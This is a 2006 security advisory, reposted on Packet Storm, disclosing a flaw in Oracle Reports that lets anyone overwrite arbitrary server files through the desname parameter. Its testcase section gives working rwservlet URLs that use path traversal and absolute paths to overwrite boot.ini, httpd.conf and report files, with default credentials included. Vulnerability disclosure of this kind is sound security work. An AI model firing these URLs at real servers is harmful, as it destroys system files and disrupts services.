exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

oracle_reports_overwrite_any_file.txt

oracle_reports_overwrite_any_file.txt
Posted Jan 25, 2006
Authored by Alexander Kornbrust | Site red-database-security.com

By specifing a special value for the parameter desname Oracle Reports can overwrite any file on the application server. On Windows systems an attacker can overwrite any files (e.g. boot.ini) on the application server. On UNIX system an attacker can overwrite all files (e.g. opmn.xml) which belongs to the Oracle Application Server user. This attack can be done with a simple URL.

tags | advisory
systems | windows, unix
SHA-256 | 100bcb12928b2140f513bf2498d97f32bac11ba0f7d933420a1441a525169dcd

oracle_reports_overwrite_any_file.txt

Change Mirror Download
Hello FD-Reader

It took only 889 days to fix this problem.

Summary and additional information concerning the Oracle January 2006
CPU is available here:
http://www.red-database-security.com/advisory/oracle_cpu_jan_2006.html

##########
http://www.red-database-security.com/advisory/oracle_reports_overwrite_a
ny_file.html

########################################################################
#
Name Overwrite any file via desname in Oracle Reports
Severity High Risk
Category File overwrite
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Date 25 August 2005 (V 1.02)
Cert VU# 472148
CVE CAN-2005-2371
Oracle Bug 5883603
Time to fix 889 days ago


Details:
########
Oracle Reports is Oracle's award-winning, high-fidelity enterprise
reporting tool.

It enables businesses to give immediate access to information to all
levels within and outside of the organization in an unrivaled scalable
and secure environment. Oracle Reports, a component of the Oracle
Application Server, is used by Oracle itself for the E-Business Suite.
Many large customers are using Oracle Reports as reporting tool for
their enterprise applications.

By specifing a special value for the parameter desname Oracle Reports
can overwrite any file on the application server.
On Windows systems an attacker can overwrite any files (e.g. boot.ini)
on the application server.
On UNIX system an attacker can overwrite all files (e.g. opmn.xml) which
belongs to the Oracle Application Server user.

This attack can be done with a simple URL.


Affected Products:
##################
Internet Application Server
Oracle Application Server
Oracle Developer Suite

Patch Information:
##################
This bug is finally fixed with Critical Patch Update January 2006.


Testcase:
#########
Overwrite the boot.ini with the ../-syntax with PDF output (on a Windows
system)
http://myserver.com:7779/reports/rwservlet?server=repserv+userid=scott/t
iger@iasdb+report=anyreport.rdf+destype=file+desformat=PDF+desname=../..
/../boot.ini

Overwrite the boot.ini via an absolute path with PDF output (on a
Windows system)
http://myserver.com:7779/reports/rwservlet?server=repserv+userid=scott/t
iger@iasdb+report=anyreport.rdf+destype=file+desformat=PDF+desname=c:\bo
ot.ini

Overwrite the file httpd.conf with PDF output (on a UNIX system)
http://myserver.com:7779/reports/rwservlet?server=repserv+myconn+report=
anyreport.rdf+destype=file+desformat=PDF+desname=/oracle/iasapp/Apache/A
pache/conf/httpd.conf

Overwrite any report (or form) with PDF output (on a UNIX system)
http://myserver.com:7779/reports/rwservlet?server=repserv+myconn+report=
anyreport.rdf+destype=file+desformat=PDF+desname=/oracle/iasapp/reports/
anyreport.rdf




History
12-aug-2003 Oracle secalert was informed
26-sep-2003 Bug confirmed
15-apr-2005 Red-Database-Security informed Oracle secalert that this
vulnerability will publish after CPU July 2005
Red-Database-Security offered Oracle more time if it is not possible to
provide a fix ==> NO FEEDBACK.
12-jul-2005 Oracle published CPU July 2005 without fixing this issue
18-jul-2005 Red-Database-Security published this advisory
21-jul-2005 Cert VU# and affected products added
25-aug-2005 CVE number added
16-sep-2005 Workaround was incomplete and is now correct (Thanks to D.
Nachbar for this information)
13-jan-2005 days since initial report updated
17-jan-2006 Oracle published the Critical Patch Update January 2006 (CPU
January 2006)


(c) 2006 by Red-Database-Security GmbH
http://www.red-database-security.com
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close